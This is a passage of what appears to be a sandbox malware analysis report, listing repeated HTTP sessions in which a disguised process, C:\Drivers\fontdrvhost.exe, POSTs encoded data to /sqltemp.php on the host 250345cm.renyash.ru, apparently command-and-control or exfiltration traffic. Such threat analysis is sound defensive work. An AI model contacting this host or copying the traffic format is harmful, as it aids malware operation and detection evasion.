cfL4;desc="?proto=TCP&rtt=3666&min_rtt=2247&rtt_var=3681&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=107352&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	50042	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:23.603698015 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:53:23.949152946 CET	1012	OUT	Data Raw: 56 51 5f 54 51 5b 54 53 58 56 52 59 56 5d 59 53 5b 5f 54 50 55 5f 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VQ_TQ[TSXVRYV]YS[_TPU_PUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Y3,)]7=\%>(8=78^<9+T*,4!?(;E&,'R.:&Y.,Y-1
Jan 1, 2025 14:53:24.048075914 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:24.323241949 CET	801	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5EzZy1cZVCnMPbYriIiAqH80vnAnrnLSEH5U8xZQKZpHx8ke8X8qm41SFlPQBNkDzHh%2Br2f4zEKogYB8zWopxSJVjckoequET2DJ9BWdLoDkJtJOHegRBc1gtoiaBY0Sf3h5wMyl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fecd082dc332-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7931&min_rtt=1668&rtt_var=13152&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=28198&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	50048	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:24.447185040 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:24.792975903 CET	1012	OUT	Data Raw: 56 50 5f 52 51 58 54 57 58 56 52 59 56 5e 59 57 5b 5f 54 58 55 58 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VP_RQXTWXVRYV^YW[_TXUXP\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'/]7,.3/\" [0_()'>=4Z!2?85%Y;-&Y.,Y-
Jan 1, 2025 14:53:24.909769058 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:25.082488060 CET	804	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KPKbdoRVT0aSTMzq%2FbN7hWoY2cRUb5KfTrd%2B487IHNEvXo7lVpCbCgBigewRzdh5at2mF8Huv6ZCGkyJDOYmBm8%2BhxT3kK0uM0rTZPl5EuXNW0yCKtxteYX0baYrjw4dB6ECBEaN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fed26f2f43cf-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4230&min_rtt=1681&rtt_var=5728&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=66144&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	50053	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:25.197386026 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:25.543051004 CET	1012	OUT	Data Raw: 56 50 5a 53 54 51 51 56 58 56 52 59 56 58 59 50 5b 58 54 51 55 5b 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VPZSTQQVXVRYVXYP[XTQU[P_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.0)Y#?)3#@.:9V4=(*)$>$]717Z+B2<<,:&Y.,Y-%
Jan 1, 2025 14:53:25.659749031 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:25.829822063 CET	807	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L%2FYnn5wxWPV3uCvuL8d4kd1crSsHZIS4QXXZdt4S9ToCz0GxgU2ChRW1%2Fci3tZVv8A4%2B5M1DjeW0c2Sd0OzTGlcHR5FDwhVWfHn0%2BkmdGso%2FwzXQqTy7ZfN69TDmnWTWHXwu5Foj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fed71faf4273-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4206&min_rtt=1677&rtt_var=5688&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=66627&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	50058	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:25.950170040 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:26.308656931 CET	1012	OUT	Data Raw: 56 52 5f 56 51 58 54 54 58 56 52 59 56 5e 59 52 5b 5e 54 50 55 5e 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VR_VQXTTXVRYV^YR[^TPU^PXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z3&7,"0>'8U4<Z+9;U==?##[+)%?9&Y.,Y-
Jan 1, 2025 14:53:26.393954992 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:26.564632893 CET	803	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1LoZ953PszLO011RtsUXXSCPSq8L4VOkXUeHxu2s0Uty5UGodvgd%2BWbgDtN82Yhgoif83SSvlYf8d88cPaHgbZ7TECaMkuNgLOQFyq4UuG3T%2FmxXettsYE4IG1Vl8ZoZj5FLnvh7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fedba93b4225-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2523&min_rtt=1704&rtt_var=2277&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=176841&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	50064	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:26.682040930 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:27.027513027 CET	1012	OUT	Data Raw: 53 55 5a 50 54 5a 51 51 58 56 52 59 56 58 59 5e 5b 5e 54 50 55 58 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SUZPTZQQXVRYVXY^[^TPUXP_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.'5Y#Y>3>8"7><^?9+T>>] 2\<;%7-&Y.,Y-%
Jan 1, 2025 14:53:27.135472059 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:27.395225048 CET	807	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ogsskodnV4plo30qJnsZj6A%2FcR00dz49AHITzB1Hh5Any7rYzKW85MD7wPqS91hGhGLV5UG7JjaiAi8wehRARTrgrYLEZmlNEZbmcqVPWy6IzIUvi224cjPjSAX%2F1mllfXs5%2FU%2F1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fee05bda1875-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2785&min_rtt=1485&rtt_var=3157&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=122812&cwnd=152&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	50070	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:27.527115107 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.4	50072	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:27.784956932 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1852 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:28.136714935 CET	1852	OUT	Data Raw: 53 53 5a 57 51 5d 51 50 58 56 52 59 56 5d 59 55 5b 52 54 5e 55 5c 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SSZWQ]QPXVRYV]YU[RT^U\PXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.0Y% ]%.(/9T40^?;T./#"$?+=A&/'U9:&Y.,Y-1
Jan 1, 2025 14:53:28.230123997 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:28.502389908 CET	959	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0r2KBWlpIe%2Fn6EwioBNso95yxyAvhzOvUTNKGzG3a7qL3L%2FIAnWGJDGcX1ZrbnMirX526sB%2B7%2BFbFOsFBIB6sf8uhDttVBJk0M7TGyQg1pj2p7fam301F6lz0GIjBy%2FOsXzH70Z%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fee72a618ce3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4976&min_rtt=1910&rtt_var=6849&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=55215&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1f 26 0d 28 2d 04 55 26 22 09 04 2b 2e 27 1f 25 2d 31 02 3f 06 08 59 30 3e 3b 5a 3d 3a 3f 5d 35 2c 31 5e 31 3b 20 5a 34 2d 38 06 24 24 2b 59 05 1c 20 0b 21 3f 3c 59 29 5b 27 1b 31 11 2a 00 26 2e 38 15 28 28 28 1f 37 2b 24 06 24 2e 3b 03 29 14 06 1d 30 3f 2b 5e 39 3f 25 10 24 3a 2c 54 00 11 26 51 24 1f 3c 59 20 27 38 11 22 31 13 5f 32 0a 0c 18 26 05 33 52 20 2a 2e 5d 31 54 2f 5b 21 20 39 03 26 2b 29 58 23 3e 23 18 3d 3e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&(-U&"+.'%-1?Y0>;Z=:?]5,1^1; Z4-8$$+Y !?<Y)['1&.8(((7+$$.;)0?+^9?%$:,T&Q$<Y '8"1_2&3R .]1T/[! 9&+)X#>#=>%S -H?WS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.4	50074	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:27.903424978 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:28.261713028 CET	1012	OUT	Data Raw: 56 5e 5f 5c 51 5c 54 55 58 56 52 59 56 5d 59 53 5b 52 54 51 55 5d 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: V^_\Q\TUXVRYV]YS[RTQU]PYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-$" ?>%-;B8)7>#97=4\7<;6&<8.&Y.,Y-1
Jan 1, 2025 14:53:28.346236944 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:28.609782934 CET	805	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yGHxmRQzC0OnNHIugWGf3tOtU3e0wPgaV4fnbfO81U695CBxunFhX2apm86C1Sy3m5a%2FaxQUIot4pjHtZa6paWTZku%2FyggfI3kyneg0rIBozm%2BRjELlGKvK5nxhJzfGOU76lBGgj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fee7ec73c440-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2416&min_rtt=1503&rtt_var=2391&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=165645&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.4	50081	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:28.728593111 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:53:29.074196100 CET	1012	OUT	Data Raw: 53 57 5f 57 54 5c 54 52 58 56 52 59 56 5c 59 5f 5b 5c 54 5b 55 5d 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SW_WT\TRXVRYV\Y_[\T[U]P^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z3?6",:'E/:)W4.8Z<9<.' "$<1,-&Y.,Y-5
Jan 1, 2025 14:53:29.192742109 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:29.459642887 CET	808	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0e4rRNKEM9T0%2FNlZW9Shno1rCjGy0hCX8LuCQoTnKte9Tvlg0Jvh9V69kURL9T8eeY%2BmiDWAqBgEY6649Dam1dfWY%2F6uPxpdUmdm%2BHNJQQErzOmtcvT6NIcpnbX3C%2B9MML2ODq2p"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2feed2fd27c87-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4258&min_rtt=1888&rtt_var=5448&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=70020&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.4	50087	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:29.588741064 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:29.933598995 CET	1012	OUT	Data Raw: 56 53 5f 51 54 5d 54 51 58 56 52 59 56 5f 59 55 5b 5c 54 51 55 5b 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VS_QT]TQXVRYV_YU[\TQU[PYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z36#>0>(/* >'+:8(. !2\(;1,'U9:&Y.,Y-9
Jan 1, 2025 14:53:30.045011044 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:30.214221954 CET	806	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P2SiNEX0NvRPiUdb15V7crHwC3BLCfEg71TJk9LTLKxUUq51wJRpTKp08p3DoHCI6GdS16UUKp869Q9D18NcXsPEgOxj9t2BLd1hbn8FOe6o%2F6xTVA%2BVTs7okAp%2BfpF%2BOzDMJrti"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fef28b6942bd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4447&min_rtt=1678&rtt_var=6168&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=61257&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.4	50093	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:30.347722054 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:30.699337006 CET	1012	OUT	Data Raw: 53 54 5f 57 54 5d 51 55 58 56 52 59 56 5c 59 52 5b 5a 54 5d 55 5e 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: ST_WT]QUXVRYV\YR[ZT]U^P^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-$ Y1X3X</!W4=<Z+* *>4 Z(%, :&Y.,Y-5
Jan 1, 2025 14:53:30.798696041 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:31.052902937 CET	806	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xkuVUkxeSjpvTPLATswW9Em1u2DS7u%2F9YxsmbV%2BgRenLNfZ2VNyswpb%2FKmUr0v4z9NbbLQ3f3Naim9Z3rKHIU7qPu2GnTHuZtagy4CZ2TS5oQ2Lq67Htv%2FmJYskEJsypb2X4MmJH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fef738314304-EWR alt-svc: h3=":443"; ma=86400 server-timing: 